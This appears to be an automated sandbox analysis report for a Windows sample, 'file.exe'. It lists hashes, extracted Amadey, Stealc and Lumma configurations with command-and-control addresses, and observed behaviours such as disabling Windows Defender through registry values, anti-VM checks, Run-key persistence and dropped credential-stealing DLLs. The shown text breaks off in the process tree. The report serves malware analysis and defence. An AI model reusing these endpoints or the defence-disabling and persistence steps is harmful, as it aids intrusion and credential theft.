Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28-11-2024 20:01
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20241007-en
General
-
Target
file.exe
-
Size
1.8MB
-
MD5
f0ecf1a8076890546c2210d5373f498a
-
SHA1
1997eb844617f4770b81cf3c0ff9cefbdc401853
-
SHA256
b40bca0264f21f6ad389319dd05a41d8168a8ac3e150ac1b2e21293711e62f18
-
SHA512
5e0debf6e8a8f8747644bc6bd58ecbd01f6db52f8271d56b1b1f832fb9d201329cf54534316ca9fdd290044236a7b15a5468f2353ad079531a55910587e95a01
-
SSDEEP
49152:P3MT8PW2xYc889iFc/tMLcanXfOK1QZ0aXPJVlTa:P3MD8PLMStMBfLGvPJVla
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
amadey
5.10
e43a13
http://154.216.20.237
-
install_dir
9f16311490
-
install_file
Gxtuum.exe
-
strings_key
a7aaea3610a351d7a88f318681678260
-
url_paths
/Gd84kkjf/index.php
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
Signatures
-
Amadey family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 237cfded39.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 237cfded39.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 237cfded39.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 237cfded39.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 237cfded39.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 237cfded39.exe -
Stealc family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 45dc7b2666.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 45dc7b2666.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ file.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 68f75721d4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 718fffc7bd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fd115d1481.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 237cfded39.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 173 3220 rundll32.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 718fffc7bd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 237cfded39.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 718fffc7bd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 68f75721d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 68f75721d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 45dc7b2666.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fd115d1481.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 237cfded39.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 45dc7b2666.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fd115d1481.exe -
Executes dropped EXE 9 IoCs
pid Process 2884 skotes.exe 3016 68f75721d4.exe 668 t6kzDd6.exe 2432 Gxtuum.exe 1672 718fffc7bd.exe 300 fd115d1481.exe 3048 65bf6b8264.exe 2600 237cfded39.exe 3668 45dc7b2666.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine file.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 68f75721d4.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 718fffc7bd.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine fd115d1481.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 237cfded39.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 45dc7b2666.exe -
Loads dropped DLL 21 IoCs
pid Process 1152 file.exe 1152 file.exe 2884 skotes.exe 2884 skotes.exe 2884 skotes.exe 668 t6kzDd6.exe 668 t6kzDd6.exe 2884 skotes.exe 2884 skotes.exe 2884 skotes.exe 2884 skotes.exe 2884 skotes.exe 3016 68f75721d4.exe 3220 rundll32.exe 3220 rundll32.exe 3220 rundll32.exe 3220 rundll32.exe 1980 rundll32.exe 1980 rundll32.exe 1980 rundll32.exe 1980 rundll32.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 237cfded39.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 237cfded39.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\fd115d1481.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009996001\\fd115d1481.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\65bf6b8264.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009997001\\65bf6b8264.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\237cfded39.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009998001\\237cfded39.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\718fffc7bd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009995001\\718fffc7bd.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000018745-183.dat autoit_exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\clip64.dll Gxtuum.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll Gxtuum.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 1152 file.exe 2884 skotes.exe 3016 68f75721d4.exe 1672 718fffc7bd.exe 300 fd115d1481.exe 2600 237cfded39.exe 3668 45dc7b2666.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job file.exe File created C:\Windows\Tasks\Gxtuum.job t6kzDd6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 17 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 68f75721d4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language t6kzDd6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 237cfded39.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 45dc7b2666.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 718fffc7bd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fd115d1481.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 65bf6b8264.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2904 cmd.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 1508 taskkill.exe 2124 taskkill.exe 936 taskkill.exe 604 taskkill.exe 2292 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10348263d041db01 powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings firefox.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Gxtuum.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 718fffc7bd.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 718fffc7bd.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 718fffc7bd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Gxtuum.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 1152 file.exe 2884 skotes.exe 3016 68f75721d4.exe 1672 718fffc7bd.exe 300 fd115d1481.exe 3048 65bf6b8264.exe 2600 237cfded39.exe 2600 237cfded39.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 2600 237cfded39.exe 2600 237cfded39.exe 3668 45dc7b2666.exe 3668 45dc7b2666.exe 3668 45dc7b2666.exe 3668 45dc7b2666.exe 3668 45dc7b2666.exe 3668 45dc7b2666.exe 3668 45dc7b2666.exe 3668 45dc7b2666.exe 3668 45dc7b2666.exe 3668 45dc7b2666.exe 3668 45dc7b2666.exe 2432 Gxtuum.exe 3348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 2292 taskkill.exe Token: SeDebugPrivilege 1508 taskkill.exe Token: SeDebugPrivilege 2124 taskkill.exe Token: SeDebugPrivilege 936 taskkill.exe Token: SeDebugPrivilege 604 taskkill.exe Token: SeDebugPrivilege 1768 firefox.exe Token: SeDebugPrivilege 1768 firefox.exe Token: SeDebugPrivilege 2600 237cfded39.exe Token: SeDebugPrivilege 3348 powershell.exe -
Suspicious use of FindShellTrayWindow 18 IoCs
pid Process 1152 file.exe 668 t6kzDd6.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 1768 firefox.exe 1768 firefox.exe 1768 firefox.exe 1768 firefox.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe -
Suspicious use of SendNotifyMessage 15 IoCs
pid Process 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 1768 firefox.exe 1768 firefox.exe 1768 firefox.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe 3048 65bf6b8264.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1152 wrote to memory of 2884 1152 file.exe 31 PID 1152 wrote to memory of 2884 1152 file.exe 31 PID 1152 wrote to memory of 2884 1152 file.exe 31 PID 1152 wrote to memory of 2884 1152 file.exe 31 PID 2884 wrote to memory of 3016 2884 skotes.exe 33 PID 2884 wrote to memory of 3016 2884 skotes.exe 33 PID 2884 wrote to memory of 3016 2884 skotes.exe 33 PID 2884 wrote to memory of 3016 2884 skotes.exe 33 PID 2884 wrote to memory of 668 2884 skotes.exe 35 PID 2884 wrote to memory of 668 2884 skotes.exe 35 PID 2884 wrote to memory of 668 2884 skotes.exe 35 PID 2884 wrote to memory of 668 2884 skotes.exe 35 PID 668 wrote to memory of 2432 668 t6kzDd6.exe 36 PID 668 wrote to memory of 2432 668 t6kzDd6.exe 36 PID 668 wrote to memory of 2432 668 t6kzDd6.exe 36 PID 668 wrote to memory of 2432 668 t6kzDd6.exe 36 PID 2884 wrote to memory of 1672 2884 skotes.exe 37 PID 2884 wrote to memory of 1672 2884 skotes.exe 37 PID 2884 wrote to memory of 1672 2884 skotes.exe 37 PID 2884 wrote to memory of 1672 2884 skotes.exe 37 PID 2884 wrote to memory of 300 2884 skotes.exe 38 PID 2884 wrote to memory of 300 2884 skotes.exe 38 PID 2884 wrote to memory of 300 2884 skotes.exe 38 PID 2884 wrote to memory of 300 2884 skotes.exe 38 PID 2884 wrote to memory of 3048 2884 skotes.exe 40 PID 2884 wrote to memory of 3048 2884 skotes.exe 40 PID 2884 wrote to memory of 3048 2884 skotes.exe 40 PID 2884 wrote to memory of 3048 2884 skotes.exe 40 PID 3048 wrote to memory of 2292 3048 65bf6b8264.exe 41 PID 3048 wrote to memory of 2292 3048 65bf6b8264.exe 41 PID 3048 wrote to memory of 2292 3048 65bf6b8264.exe 41 PID 3048 wrote to memory of 2292 3048 65bf6b8264.exe 41 PID 3048 wrote to memory of 1508 3048 65bf6b8264.exe 44 PID 3048 wrote to memory of 1508 3048 65bf6b8264.exe 44 PID 3048 wrote to memory of 1508 3048 65bf6b8264.exe 44 PID 3048 wrote to memory of 1508 3048 65bf6b8264.exe 44 PID 3048 wrote to memory of 2124 3048 65bf6b8264.exe 46 PID 3048 wrote to memory of 2124 3048 65bf6b8264.exe 46 PID 3048 wrote to memory of 2124 3048 65bf6b8264.exe 46 PID 3048 wrote to memory of 2124 3048 65bf6b8264.exe 46 PID 3048 wrote to memory of 936 3048 65bf6b8264.exe 48 PID 3048 wrote to memory of 936 3048 65bf6b8264.exe 48 PID 3048 wrote to memory of 936 3048 65bf6b8264.exe 48 PID 3048 wrote to memory of 936 3048 65bf6b8264.exe 48 PID 3048 wrote to memory of 604 3048 65bf6b8264.exe 50 PID 3048 wrote to memory of 604 3048 65bf6b8264.exe 50 PID 3048 wrote to memory of 604 3048 65bf6b8264.exe 50 PID 3048 wrote to memory of 604 3048 65bf6b8264.exe 50 PID 3048 wrote to memory of 2132 3048 65bf6b8264.exe 52 PID 3048 wrote to memory of 2132 3048 65bf6b8264.exe 52 PID 3048 wrote to memory of 2132 3048 65bf6b8264.exe 52 PID 3048 wrote to memory of 2132 3048 65bf6b8264.exe 52 PID 2132 wrote to memory of 1768 2132 firefox.exe 53 PID 2132 wrote to memory of 1768 2132 firefox.exe 53 PID 2132 wrote to memory of 1768 2132 firefox.exe 53 PID 2132 wrote to memory of 1768 2132 firefox.exe 53 PID 2132 wrote to memory of 1768 2132 firefox.exe 53 PID 2132 wrote to memory of 1768 2132 firefox.exe 53 PID 2132 wrote to memory of 1768 2132 firefox.exe 53 PID 2132 wrote to memory of 1768 2132 firefox.exe 53 PID 2132 wrote to memory of 1768 2132 firefox.exe 53 PID 2132 wrote to memory of 1768 2132 firefox.exe 53 PID 2132 wrote to memory of 1768 2132 firefox.exe 53 PID 2132 wrote to memory of 1768 2132 firefox.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
